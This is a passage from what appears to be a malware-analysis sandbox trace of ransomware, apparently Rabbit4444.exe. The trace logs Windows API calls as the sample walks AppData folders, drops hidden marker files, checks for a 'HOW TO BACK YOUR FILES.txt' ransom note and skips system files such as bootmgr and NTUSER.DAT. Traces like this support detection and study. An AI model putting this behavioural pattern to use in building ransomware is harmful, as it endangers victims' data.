ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef083cde, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.274] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0063.274] lstrcpyW (in: lpString1=0x130ebe6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.274] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.274] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.275] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.275] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.275] CloseHandle (hObject=0x278) returned 1 [0063.275] CloseHandle (hObject=0x298) returned 1 [0063.275] GetCurrentThreadId () returned 0xd98 [0063.275] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fa8 [0063.275] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache" [0063.275] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1246a0 | out: hHeap=0xe0000) returned 1 [0063.275] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fa0 | out: hHeap=0xe0000) returned 1 [0063.275] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache" [0063.275] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache\\" [0063.275] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" [0063.275] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.279] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.281] FlushFileBuffers (hFile=0x298) returned 1 [0063.282] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.283] CloseHandle (hObject=0x298) returned 1 [0063.283] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache") returned 86 [0063.283] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.283] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9645a4f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba32b1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef0a9ea5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0063.283] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.283] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.283] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.283] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.283] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9645a4f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba32b1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef0a9ea5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.284] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.284] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.284] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.284] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.284] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.284] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef0a9ea5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef0a9ea5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef0a9ea5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.284] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.284] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.284] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef0a9ea5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef0a9ea5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef0a9ea5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.284] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0063.284] lstrcpyW (in: lpString1=0x130ebe6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.284] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.284] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.285] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.285] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.285] CloseHandle (hObject=0x278) returned 1 [0063.285] CloseHandle (hObject=0x298) returned 1 [0063.285] GetCurrentThreadId () returned 0xd98 [0063.285] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0063.285] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData" [0063.285] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118d38 | out: hHeap=0xe0000) returned 1 [0063.285] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0063.285] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData" [0063.285] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData\\" [0063.285] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" [0063.285] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\appdata\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.287] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.289] FlushFileBuffers (hFile=0x298) returned 1 [0063.290] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.290] CloseHandle (hObject=0x298) returned 1 [0063.291] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData") returned 83 [0063.291] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.291] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9704670, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba2bbc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef0a9ea5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102990 [0063.291] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.291] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.291] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.291] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.291] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9704670, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba2bbc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef0a9ea5, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.291] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.291] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.291] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.291] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.291] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.291] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef0a9ea5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef0a9ea5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef0d00cb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.291] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.291] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.291] FindNextFileW (in: hFindFile=0x102990, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef0a9ea5, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef0a9ea5, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef0d00cb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0063.291] FindClose (in: hFindFile=0x102990 | out: hFindFile=0x102990) returned 1 [0063.292] lstrcpyW (in: lpString1=0x130ebe0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.292] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.292] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0063.292] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.293] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.293] CloseHandle (hObject=0x278) returned 1 [0063.293] CloseHandle (hObject=0x298) returned 1 [0063.293] GetCurrentThreadId () returned 0xd98 [0063.293] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222e8 [0063.293] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC" [0063.293] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121710 | out: hHeap=0xe0000) returned 1 [0063.293] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222e0 | out: hHeap=0xe0000) returned 1 [0063.293] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC" [0063.293] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\" [0063.293] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" [0063.293] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsphone_8wekyb3d8bbwe\\ac\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.296] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.302] FlushFileBuffers (hFile=0x298) returned 1 [0063.303] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.303] CloseHandle (hObject=0x298) returned 1 [0063.305] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC") returned 78 [0063.305] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.305] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9750aec, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x38ee4cbd, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xef0d00cb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0063.305] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.305] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.305] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.305] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.305] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x9750aec, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x38ee4cbd, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xef0d00cb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.305] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.305] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.305] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.305] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.305] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.305] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef0d00cb, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef0d00cb, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef0d00cb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.305] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.305] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.305] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x9776d2f, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1ba0882, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x9776d2f, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0063.305] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.305] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.305] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0063.305] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0063.305] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0063.305] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0063.305] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0063.306] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0063.306] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0063.306] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0063.306] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0063.306] lstrcpyW (in: lpString1=0x130ebd6, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0063.306] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0063.306] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache" [0063.306] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\" [0063.306] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsPhone_8wekyb3d8bbwe\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: 